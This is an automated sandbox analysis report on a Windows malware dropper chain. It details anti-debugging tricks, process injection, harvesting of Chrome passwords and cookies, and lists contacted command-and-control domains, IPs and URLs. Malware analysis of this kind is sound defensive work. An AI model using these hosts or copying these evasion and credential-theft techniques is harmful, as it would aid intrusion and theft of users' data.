Source: 1E1C360C582DF797.exe, 00000015.00000003.551997697.0000000005D36000.00000004.00000001.sdmp Binary or memory string: SystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: C:\Users\user\AppData\Roaming\1607186572092.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent, 4_2_10019FF0
Hides threads from debuggers
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process queried: DebugPort
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process queried: DebugPort
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process queried: DebugFlags
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6652CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E6652CE
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E65041D OutputDebugStringA,GetLastError, 0_2_6E65041D
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E672571 mov eax, dword ptr fs:[00000030h] 0_2_6E672571
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6780EB mov eax, dword ptr fs:[00000030h] 0_2_6E6780EB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01237363 mov eax, dword ptr fs:[00000030h] 1_2_01237363
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_00404C06 mov eax, dword ptr fs:[00000030h] 4_2_00404C06
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019DE0 mov eax, dword ptr fs:[00000030h] 4_2_10019DE0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h] 4_2_10019E13
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h] 4_2_10019E13
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h] 4_2_10019E70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h] 4_2_10019E70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019ED0 mov eax, dword ptr fs:[00000030h] 4_2_10019ED0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E631660 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,CloseHandle,GetProcessHeap,HeapFree, 0_2_6E631660
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E65FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6E65FB78
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6652CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E6652CE
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122EEB3 SetUnhandledExceptionFilter, 1_2_0122EEB3
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122F07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0122F07B
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012384EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_012384EF
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122ED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0122ED65
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_0040825D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0040825D
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10015354 SetUnhandledExceptionFilter,__encode_pointer, 4_2_10015354
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10015376 __decode_pointer,SetUnhandledExceptionFilter, 4_2_10015376
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 4_2_10018413
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_1000E44D
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026EBE0B SetUnhandledExceptionFilter, 21_2_026EBE0B
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026EBDF7 SetUnhandledExceptionFilter, 21_2_026EBDF7
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E83315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_04E83315
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E86CE8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_04E86CE8
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E88D22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_04E88D22
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError, 4_2_1001A0F0
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122EBBB cpuid 1_2_0122EBBB
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: GetLocaleInfoW,GetNumberFormatW, 1_2_0122A5BC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: GetLocaleInfoA, 4_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA, 21_2_026EF2DC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA,_strncpy, 21_2_026F0636
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 21_2_026F2A70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _strlen,EnumSystemLocalesA, 21_2_026F0B65
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 21_2_026F2B23
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 21_2_026F0B9C
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 21_2_026F2940
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 21_2_026F29FC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat, 21_2_026F0C77
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _strlen,EnumSystemLocalesA, 21_2_026F0C22
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA,_xtoa_s@20, 21_2_04E8B5DD
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 21_2_04E95CD8
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 21_2_04E95D79
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 21_2_04E95D3D
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA, 21_2_04E95F69
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA, 21_2_04E9585F
Queries device information via Setup API
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 4_2_10019780
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll VolumeInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E674FB1 GetSystemTimeAsFileTime, 0_2_6E674FB1
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E677DBD _free,GetTimeZoneInformation,_free, 0_2_6E677DBD
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406831
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6294C0 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,FreeLibrary,CorBindToRuntimeEx,FreeLibrary,FreeLibrary,FreeLibrary, 0_2_6E6294C0
Behavior Graph (text recovered from the rendered graph):

Behavior Graph ID: 327203  Sample: h1GodtbhC8.exe  Startdate: 05/12/2020  Architecture: WINDOWS  Score: 100

Start node: contacts dream.pics, www.sodown.xyz and 30 other IPs or domains; signatures: Multi AV Scanner detection for domain / URL, Malicious sample detected (through community Yara rule), Antivirus detection for URL or domain, 14 other signatures

Process tree:
  h1GodtbhC8.exe (dropped: C:\Users\user\AppData\Local\...\Sibuia.dll PE32, C:\Users\user\AppData\...\h1GodtbhC8.exe.log ASCII, C:\Users\user\AppData\Local\...\SibClr.dll PE32, 2 other files, none malicious)
    setup.exe (dropped: C:\Program Files (x86)\...\aliens.exe PE32)
      aliens.exe (contacts EF6DF4AF06BA6896.xyz / ef6df4af06ba6896.xyz 104.28.4.129 ports 49734, 49738, 49740, CLOUDFLARENETUS United States; dropped: C:\Users\user\...\1E1C360C582DF797.exe PE32; signatures: Installs new ROOT certificates, Hides threads from debuggers)
        1E1C360C582DF797.exe (contacts 1c5491a87d65f1ef.club 172.67.142.39 ports 443, 49739, CLOUDFLARENETUS United States; 192.168.2.1; 2 other IPs or domains; signatures: Detected unpacking (creates a PE file in dynamic memory), Machine Learning detection for dropped file, Tries to harvest and steal browser information (history, passwords, etc), Contains functionality to detect sleep reduction / modifications)
          1607186572092.exe
          1607186588295.exe
          ThunderFW.exe
        cmd.exe (contacts 127.0.0.1; signature: Uses ping.exe to sleep)
          conhost.exe
          PING.EXE
        1E1C360C582DF797.exe (contacts ef6df4af06ba6896.xyz)
          cmd.exe
            conhost.exe
        msiexec.exe
  msiexec.exe

Contacted Public IPs

IP             Domain   Country        ASN    ASN Name         Malicious
172.67.142.39  unknown  United States  13335  CLOUDFLARENETUS  false
104.28.4.129   unknown  United States  13335  CLOUDFLARENETUS  false

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
ef6df4af06ba6896.xyz 104.28.4.129 true
cnchubstat.sandai.net 140.206.225.136 true
bgphub5u.sandai.net 39.98.57.143 true
iplogger.org 88.99.66.31 true
dream.pics 8.208.85.95 true
bgphub5pr.sandai.net 47.92.39.6 true
EF6DF4AF06BA6896.xyz 104.28.4.129 true
1c5491a87d65f1ef.club 172.67.142.39 true
cnc.hub5pnc.sandai.net 47.92.99.221 true
www.sodown.xyz 104.18.63.67 true
cnc.hub5pn.sandai.net 153.3.232.174 true
cncidx.m.hub.sandai.net 112.64.218.64 true
pmap.sandai.net 47.97.7.140 true
hub5c.hz.sandai.net unknown unknown
hub5idx.shub.hz.sandai.net unknown unknown
hub5u.hz.sandai.net unknown unknown
hub5sr.shub.hz.sandai.net unknown unknown
score.phub.hz.sandai.net unknown unknown
hubstat.hz.sandai.net unknown unknown
pmap.hz.sandai.net unknown unknown
hub5pr.hz.sandai.net unknown unknown
hub5pn.hz.sandai.net unknown unknown
imhub5pr.hz.sandai.net unknown unknown
hub5pnc.hz.sandai.net unknown unknown
relay.phub.hz.sandai.net unknown unknown

Contacted URLs

Name                                  Malicious  Antivirus Detection    Reputation
http://ef6df4af06ba6896.xyz/info/w    false      Avira URL Cloud: safe  unknown
http://EF6DF4AF06BA6896.xyz/info/ddd  false      Avira URL Cloud: safe  unknown
http://ef6df4af06ba6896.xyz/info/du   false                             unknown
http://ef6df4af06ba6896.xyz/info/g    false      Avira URL Cloud: safe  unknown
http://ef6df4af06ba6896.xyz/info/e    false      Avira URL Cloud: safe  unknown
http://ef6df4af06ba6896.xyz/info/r    false                             unknown